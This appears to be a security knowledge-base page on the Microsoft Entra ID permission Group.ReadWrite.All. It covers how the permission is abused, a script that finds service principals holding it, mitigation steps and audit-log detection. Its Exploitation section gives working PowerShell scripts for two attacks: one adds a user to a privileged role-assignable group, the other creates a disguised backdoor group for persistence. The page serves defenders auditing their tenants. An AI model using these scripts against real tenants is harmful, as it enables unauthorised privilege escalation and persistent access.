AZ_MG_GROUP_READWRITE_ALL

Summary

FSProtect ACL Alias

Entra ID (Azure AD) Alias

Group.ReadWrite.All

Affected Object Types

Service Principals, Applications

Exploitation Certainty

Certain

Graph Permission / Role

Application Permission: Group.ReadWrite.All

Description

AZ_MG_GROUP_READWRITE_ALL represents a Microsoft Graph application permission that grants read and write access to all groups in Microsoft Entra ID (Azure AD). This is a dangerous permission because it allows:

Create, read, update, and delete groups including security groups and Microsoft 365 groups
Manage group memberships by adding or removing members from any group
Read and modify group properties such as display name, description, and visibility
Manage group owners by adding or removing owners
Create and manage dynamic membership rules for dynamic groups
Manage group settings including expiration policies and naming conventions

This permission is often abused for:

Privilege escalation: Adding attacker-controlled accounts to privileged groups (e.g., groups with Azure RBAC roles or role-assignable groups with directory roles)
Persistence: Creating hidden or innocuously named groups with elevated permissions
Lateral movement: Adding accounts to groups that have access to Azure resources, applications, or SharePoint sites
Defense evasion: Removing security team members from monitoring groups or modifying group-based Conditional Access policies

Important: This is an application permission that requires admin consent and is granted to service principals, not individual users. Once granted, the service principal can perform these actions without additional user context.

Limitation: While this permission allows adding members to role-assignable groups, it does not allow assigning directory roles directly. However, if a role-assignable group already has a directory role assigned, adding members to that group effectively grants those members the role.

Identification

PowerShell

Find Service Principals with Group.ReadWrite.All

Find-ServicePrincipals-GroupReadWriteAll.ps1

Connect-AzAccount

$permissionId = "62a82d76-70ea-41e2-9197-370581804d09"  # Group.ReadWrite.All GUID

# Step 1: Get all app role assignments across the tenant
$uri = "https://graph.microsoft.com/v1.0/servicePrincipals?`$expand=appRoleAssignments"
$allServicePrincipals = @()

while ($uri) {
    $response = Invoke-AzRestMethod -Uri $uri -Method GET
    $data = $response.Content | ConvertFrom-Json
    $allServicePrincipals += $data.value
    $uri = $data.'@odata.nextLink'
}

Write-Host "Retrieved $($allServicePrincipals.Count) service principals"

# Step 2: Filter for those with Group.ReadWrite.All
$results = @()

foreach ($sp in $allServicePrincipals) {
    $matchingAssignments = $sp.appRoleAssignments | Where-Object { $_.appRoleId -eq $permissionId }
    
    foreach ($assignment in $matchingAssignments) {
        $results += [PSCustomObject]@{
            ServicePrincipalName = $sp.displayName
            ServicePrincipalId   = $sp.id
            AppId                = $sp.appId
            PermissionName       = "Group.ReadWrite.All"
            PermissionId         = $permissionId
            ResourceId           = $assignment.resourceId
            AssignedDateTime     = $assignment.createdDateTime
        }
    }
}

Write-Host "`nFound $($results.Count) service principals with Group.ReadWrite.All"
$results | Export-Csv -Path ".\GroupReadWriteAll_ServicePrincipals.csv" -NoTypeInformation -Encoding UTF8
$results | Format-Table -AutoSize

Exploitation

An attacker with access to a service principal that has Group.ReadWrite.All can perform privilege escalation by manipulating group memberships.

Add User to a Privileged Group

Add-User-To-Group.ps1

# Authenticate as the compromised service principal
$tenantId = "<tenant-id>"
$appId = "<compromised-app-id>"
$clientSecret = "<client-secret>"

$secureSecret = ConvertTo-SecureString $clientSecret -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential($appId, $secureSecret)
Connect-AzAccount -ServicePrincipal -Credential $credential -Tenant $tenantId

# Target a role-assignable group that has Global Administrator role assigned
$group = Get-AzADGroup -DisplayName "<target-group-name>"
$user = Get-AzADUser -UserPrincipalName "<target-user-upn>"

# Add user to the group
$uri = "https://graph.microsoft.com/v1.0/groups/$($group.Id)/members/`$ref"
$body = @{
    "@odata.id" = "https://graph.microsoft.com/v1.0/directoryObjects/$($user.Id)"
} | ConvertTo-Json

$response = Invoke-AzRestMethod -Uri $uri -Method POST -Payload $body
Write-Output "Added user to group. Status: $($response.StatusCode)"

Create a Backdoor Group for Persistence

Create-Backdoor-Group.ps1

# Create a new security group with an innocuous name
$uri = "https://graph.microsoft.com/v1.0/groups"
$body = @{
    displayName     = "IT-Maintenance-Tasks"
    description     = "Scheduled maintenance task group"
    mailEnabled     = $false
    mailNickname    = "itmaintenance"
    securityEnabled = $true
    groupTypes      = @()
} | ConvertTo-Json

$response = Invoke-AzRestMethod -Uri $uri -Method POST -Payload $body
$newGroup = $response.Content | ConvertFrom-Json
Write-Output "Created group: $($newGroup.displayName) with ID: $($newGroup.id)"

$user = Get-AzADUser -UserPrincipalName "<target-user-upn>"

# Add attacker-controlled user as a member
$uri = "https://graph.microsoft.com/v1.0/groups/$($newGroup.id)/members/`$ref"
$body = @{
    "@odata.id" = "https://graph.microsoft.com/v1.0/directoryObjects/$($user.Id)"
} | ConvertTo-Json

Invoke-AzRestMethod -Uri $uri -Method POST -Payload $body

# Add attacker as owner for persistent control
$uri = "https://graph.microsoft.com/v1.0/groups/$($newGroup.id)/owners/`$ref"
$body = @{
    "@odata.id" = "https://graph.microsoft.com/v1.0/directoryObjects/$($user.Id)"
} | ConvertTo-Json

Invoke-AzRestMethod -Uri $uri -Method POST -Payload $body
Write-Output "Added attacker as member and owner of the group"

Mitigation

Audit all service principals with Group.ReadWrite.All and remove unnecessary grants.
- Go to Microsoft Entra ID -> App registrations -> select the application -> API permissions.
- Remove the Group.ReadWrite.All permission if not required.
Apply least privilege: Replace with more specific permissions where possible:
- Use Group.Read.All if only read access is needed.
- Use GroupMember.ReadWrite.All if only membership management is needed (without group creation/deletion).
- Use delegated permissions with user context when appropriate.
Protect role-assignable groups:
- Limit the number of role-assignable groups in your tenant.
- Enable Privileged Identity Management (PIM) for role-assignable groups.
- Require approval for adding members to role-assignable groups.
Implement Access Reviews for applications with high-privilege permissions:
- Go to Identity Governance -> Access Reviews -> New access review.
- Review applications with sensitive Graph permissions regularly.
Use Conditional Access to restrict service principal access:
- Limit the locations and conditions under which service principals can authenticate.

Detection

Detect permission grants and suspicious activity in Audit logs.

Go to Microsoft Entra ID -> Audit logs.
Filter by activities:
- Add app role assignment to service principal
- Add member to group
- Remove member from group
- Add group
- Delete group
- Add owner to group
- Remove owner from group

Monitor for suspicious patterns:

Membership changes to role-assignable groups by service principals.
Bulk group membership modifications.
Group creation with suspicious names or descriptions.
Membership changes to groups with Azure RBAC permissions.
Removal of members from security or monitoring groups.
Group modifications outside of change management windows.

References

PreviousAZ_MG_GRANT_ROLE NextAZ_MG_GROUPMEMBER_READWRITE_ALL

Last updated 6 days ago

Was this helpful?

hashtagSummary

hashtagDescription

hashtagIdentification

hashtagPowerShell

hashtagFind Service Principals with Group.ReadWrite.All

hashtagExploitation

hashtagAdd User to a Privileged Group

hashtagCreate a Backdoor Group for Persistence

hashtagMitigation

hashtagDetection

hashtagReferences

Summary

Description

Identification

PowerShell

Find Service Principals with Group.ReadWrite.All

Exploitation

Add User to a Privileged Group

Create a Backdoor Group for Persistence

Mitigation

Detection

References